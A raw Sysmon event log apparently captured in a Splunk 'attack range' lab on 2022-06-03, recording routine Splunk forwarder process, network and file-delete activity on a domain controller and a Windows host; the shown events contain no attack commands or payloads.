14:19:19.338{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-1867-629A-5642-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1867-629A-5642-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.338{2E1864BB-1867-629A-5642-000000005F02}4808C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000205500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:16.857{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56387-false10.0.1.12-8000- 23542300x8000000000000000205499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:19.138{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB07C72329ACB75F9133DC54138D6BAF,SHA256=97383694ED232A5EE335961E3A1DD174D2364B72C0A42168A1195723A58702DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044442Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:20.763{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC62D8331BD5C9BBB4896ED144C53BA1,SHA256=C0FA349CD08B1AA0E7F7352183A62AB247A721B012D4A67E5DAF2723B0846A9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.906{2E1864BB-1868-629A-5842-000000005F02}25164248C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.691{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1868-629A-5842-000000005F02}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1868-629A-5842-000000005F02}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.675{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1868-629A-5842-000000005F02}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.676{2E1864BB-1868-629A-5842-000000005F02}2516C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000205519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.222{2E1864BB-1868-629A-5742-000000005F02}16927036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.191{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7929B6E94C2816A63C4D6E3483AAD224,SHA256=CE0BF5968E661501859C2E3E29F22067A04162C6A45FFFED43E63786CBF721F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1868-629A-5742-000000005F02}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1868-629A-5742-000000005F02}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.006{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1868-629A-5742-000000005F02}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:20.007{2E1864BB-1868-629A-5742-000000005F02}1692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044443Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:21.857{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=423A97F6E7FC0D33ED8E65F835D42282,SHA256=8010B5C20B61078BD0C5A9D2AF35204066A149BCEC9D390457FC8B399A9D2641,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:21.290{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D1D7F02836314680E02E3C54E3C997D,SHA256=4B926397A7A8DFE7AEA4B20EFD8A502B58D901383A59C5740E64C119323D4C54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044445Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:22.951{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DCC946ADCDEA47CF7CC72D67006F4E6,SHA256=C7569633338A6236F09174A5CD2102347A087ABDE010F705C6C041ED1FE9C19D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:22.306{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E01C88E83387A36F70B7CA6DA215F8,SHA256=6EF5DB4CCC21F8E99E4857E9E438EF917645388C31E1ECB12DB580A8FEBCF892,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044444Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:19.758{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52359-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.395{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AC1AC2FDC0CD3E7D304A9AA160B0AF2,SHA256=598E89ADFD6911D062F334AC42B05D93814ABDB5EEB3C60D8A04807C39D06B66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-186B-629A-5942-000000005F02}2764C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:23.176{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 